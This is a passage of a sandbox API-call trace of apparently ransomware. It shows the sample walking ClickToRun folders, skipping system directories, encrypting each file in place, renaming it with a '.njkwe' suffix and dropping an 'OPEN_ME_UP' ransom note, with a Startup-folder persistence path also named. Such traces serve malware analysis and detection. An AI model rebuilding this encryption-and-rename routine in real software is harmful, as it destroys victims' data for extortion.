dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0068.455] GetTickCount () returned 0x1151809 [0068.455] GetTickCount () returned 0x1151809 [0068.456] GetTickCount () returned 0x1151809 [0068.456] GetTickCount () returned 0x1151809 [0068.456] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0068.456] GetProcessHeap () returned 0xbe0000 [0068.456] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0068.456] ReadFile (in: hFile=0x438, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.827] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.827] WriteFile (in: hFile=0x438, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.828] GetProcessHeap () returned 0xbe0000 [0068.828] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0068.828] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.828] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0068.830] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0068.830] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0068.830] CloseHandle (hObject=0x438) returned 1 [0068.830] GetProcessHeap () returned 0xbe0000 [0068.830] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0068.830] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe") returned 132 [0068.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0068.831] GetProcessHeap () returned 0xbe0000 [0068.831] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0068.831] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fc026f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82fc026f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfe714e00, ftLastWriteTime.dwHighDateTime=0x1d0d7e7, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0068.831] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0068.831] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 118 [0068.831] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0068.831] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0068.833] CloseHandle (hObject=0x434) returned 1 [0068.833] GetProcessHeap () returned 0xbe0000 [0068.833] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0068.833] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f9a029, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0068.833] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0068.833] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 108 [0068.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.833] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0068.834] CloseHandle (hObject=0x430) returned 1 [0068.834] GetProcessHeap () returned 0xbe0000 [0068.834] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0068.834] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3dbb3c9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8512127a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8512127a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DeploymentConfig.0.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0068.834] lstrcmpiW (lpString1="DeploymentConfig.0.xml", lpString2="Windows") returned -1 [0068.834] lstrcmpiW (lpString1="DeploymentConfig.0.xml", lpString2="$Recycle.bin") returned 1 [0068.834] lstrcmpiW (lpString1="DeploymentConfig.0.xml", lpString2="System Volume Information") returned -1 [0068.834] lstrcmpiW (lpString1="DeploymentConfig.0.xml", lpString2="Program Files") returned -1 [0068.834] lstrcmpiW (lpString1="DeploymentConfig.0.xml", lpString2="Program Files (x86)") returned -1 [0068.834] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned 62 [0068.834] StrStrIW (lpFirst="DeploymentConfig.0.xml", lpSrch=".njkwe") returned 0x0 [0068.834] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.834] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2="taridd") returned -1 [0068.834] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.835] GetTickCount () returned 0x1151980 [0068.835] GetTickCount () returned 0x1151980 [0068.835] GetTickCount () returned 0x1151980 [0068.835] GetTickCount () returned 0x1151980 [0068.835] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x2c, dwBufLen=0x80 | out: pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x80) returned 1 [0068.835] GetProcessHeap () returned 0xbe0000 [0068.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc44ec8 [0068.835] ReadFile (in: hFile=0x430, lpBuffer=0xc44ec8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesRead=0x380f55c*=0x7b6, lpOverlapped=0x0) returned 1 [0068.836] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffff84a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.836] WriteFile (in: hFile=0x430, lpBuffer=0xc44ec8*, nNumberOfBytesToWrite=0x7b6, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesWritten=0x380f55c*=0x7b6, lpOverlapped=0x0) returned 1 [0068.837] GetProcessHeap () returned 0xbe0000 [0068.837] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc44ec8 | out: hHeap=0xbe0000) returned 1 [0068.837] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.837] WriteFile (in: hFile=0x430, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f55c*=0x300, lpOverlapped=0x0) returned 1 [0068.837] WriteFile (in: hFile=0x430, lpBuffer=0x380f4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x380f4a8*, lpNumberOfBytesWritten=0x380f55c*=0x80, lpOverlapped=0x0) returned 1 [0068.837] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f55c*=0x4, lpOverlapped=0x0) returned 1 [0068.837] CloseHandle (hObject=0x430) returned 1 [0068.837] GetProcessHeap () returned 0xbe0000 [0068.837] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0068.837] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml_r00t_{3sXlE5}.njkwe") returned 82 [0068.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.839] GetProcessHeap () returned 0xbe0000 [0068.839] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0068.839] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b22dc95, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa011b19, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xfa011b19, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x7b4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DeploymentConfig.1.xml", cAlternateFileName="DEPLOY~3.XML")) returned 1 [0068.839] lstrcmpiW (lpString1="DeploymentConfig.1.xml", lpString2="Windows") returned -1 [0068.839] lstrcmpiW (lpString1="DeploymentConfig.1.xml", lpString2="$Recycle.bin") returned 1 [0068.839] lstrcmpiW (lpString1="DeploymentConfig.1.xml", lpString2="System Volume Information") returned -1 [0068.839] lstrcmpiW (lpString1="DeploymentConfig.1.xml", lpString2="Program Files") returned -1 [0068.839] lstrcmpiW (lpString1="DeploymentConfig.1.xml", lpString2="Program Files (x86)") returned -1 [0068.839] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml") returned 62 [0068.839] StrStrIW (lpFirst="DeploymentConfig.1.xml", lpSrch=".njkwe") returned 0x0 [0068.839] lstrcmpW (lpString1="DeploymentConfig.1.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.839] lstrcmpW (lpString1="DeploymentConfig.1.xml", lpString2="taridd") returned -1 [0068.839] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.839] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.840] GetTickCount () returned 0x1151980 [0068.840] GetTickCount () returned 0x1151980 [0068.840] GetTickCount () returned 0x1151980 [0068.840] GetTickCount () returned 0x1151980 [0068.840] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x2c, dwBufLen=0x80 | out: pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x80) returned 1 [0068.840] GetProcessHeap () returned 0xbe0000 [0068.840] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc44ec8 [0068.840] ReadFile (in: hFile=0x430, lpBuffer=0xc44ec8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesRead=0x380f55c*=0x7b4, lpOverlapped=0x0) returned 1 [0068.842] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffff84c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.842] WriteFile (in: hFile=0x430, lpBuffer=0xc44ec8*, nNumberOfBytesToWrite=0x7b4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesWritten=0x380f55c*=0x7b4, lpOverlapped=0x0) returned 1 [0068.842] GetProcessHeap () returned 0xbe0000 [0068.842] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc44ec8 | out: hHeap=0xbe0000) returned 1 [0068.842] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.842] WriteFile (in: hFile=0x430, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f55c*=0x300, lpOverlapped=0x0) returned 1 [0068.842] WriteFile (in: hFile=0x430, lpBuffer=0x380f4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x380f4a8*, lpNumberOfBytesWritten=0x380f55c*=0x80, lpOverlapped=0x0) returned 1 [0068.842] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f55c*=0x4, lpOverlapped=0x0) returned 1 [0068.842] CloseHandle (hObject=0x430) returned 1 [0068.842] GetProcessHeap () returned 0xbe0000 [0068.842] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0068.842] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml_r00t_{3sXlE5}.njkwe") returned 82 [0068.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.1.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.843] GetProcessHeap () returned 0xbe0000 [0068.843] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0068.843] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x534ee362, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x3c4413a9, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c4413a9, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DeploymentConfig.2.xml", cAlternateFileName="DEPLOY~2.XML")) returned 1 [0068.843] lstrcmpiW (lpString1="DeploymentConfig.2.xml", lpString2="Windows") returned -1 [0068.843] lstrcmpiW (lpString1="DeploymentConfig.2.xml", lpString2="$Recycle.bin") returned 1 [0068.843] lstrcmpiW (lpString1="DeploymentConfig.2.xml", lpString2="System Volume Information") returned -1 [0068.843] lstrcmpiW (lpString1="DeploymentConfig.2.xml", lpString2="Program Files") returned -1 [0068.843] lstrcmpiW (lpString1="DeploymentConfig.2.xml", lpString2="Program Files (x86)") returned -1 [0068.843] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned 62 [0068.843] StrStrIW (lpFirst="DeploymentConfig.2.xml", lpSrch=".njkwe") returned 0x0 [0068.843] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.843] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2="taridd") returned -1 [0068.843] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.843] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.843] GetTickCount () returned 0x1151980 [0068.843] GetTickCount () returned 0x1151980 [0068.843] GetTickCount () returned 0x1151980 [0068.843] GetTickCount () returned 0x1151980 [0068.843] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x2c, dwBufLen=0x80 | out: pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x80) returned 1 [0068.844] GetProcessHeap () returned 0xbe0000 [0068.844] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc44ec8 [0068.844] ReadFile (in: hFile=0x430, lpBuffer=0xc44ec8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesRead=0x380f55c*=0x566, lpOverlapped=0x0) returned 1 [0068.848] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffffa9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.848] WriteFile (in: hFile=0x430, lpBuffer=0xc44ec8*, nNumberOfBytesToWrite=0x566, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc44ec8*, lpNumberOfBytesWritten=0x380f55c*=0x566, lpOverlapped=0x0) returned 1 [0068.848] GetProcessHeap () returned 0xbe0000 [0068.849] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc44ec8 | out: hHeap=0xbe0000) returned 1 [0068.849] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.849] WriteFile (in: hFile=0x430, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f55c*=0x300, lpOverlapped=0x0) returned 1 [0068.849] WriteFile (in: hFile=0x430, lpBuffer=0x380f4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x380f4a8*, lpNumberOfBytesWritten=0x380f55c*=0x80, lpOverlapped=0x0) returned 1 [0068.849] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f55c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f55c*=0x4, lpOverlapped=0x0) returned 1 [0068.850] CloseHandle (hObject=0x430) returned 1 [0068.850] GetProcessHeap () returned 0xbe0000 [0068.850] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0068.850] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml_r00t_{3sXlE5}.njkwe") returned 82 [0068.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.850] GetProcessHeap () returned 0xbe0000 [0068.850] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0068.850] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0068.850] lstrcmpiW (lpString1="MachineData", lpString2="Windows") returned -1 [0068.850] lstrcmpiW (lpString1="MachineData", lpString2="$Recycle.bin") returned 1 [0068.850] lstrcmpiW (lpString1="MachineData", lpString2="System Volume Information") returned -1 [0068.850] lstrcmpiW (lpString1="MachineData", lpString2="Program Files") returned -1 [0068.851] lstrcmpiW (lpString1="MachineData", lpString2="Program Files (x86)") returned -1 [0068.851] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned 51 [0068.851] lstrcmpW (lpString1="MachineData", lpString2=".") returned 1 [0068.851] lstrcmpW (lpString1="MachineData", lpString2="..") returned 1 [0068.851] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.851] GetProcessHeap () returned 0xbe0000 [0068.851] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0068.851] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*") returned 53 [0068.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 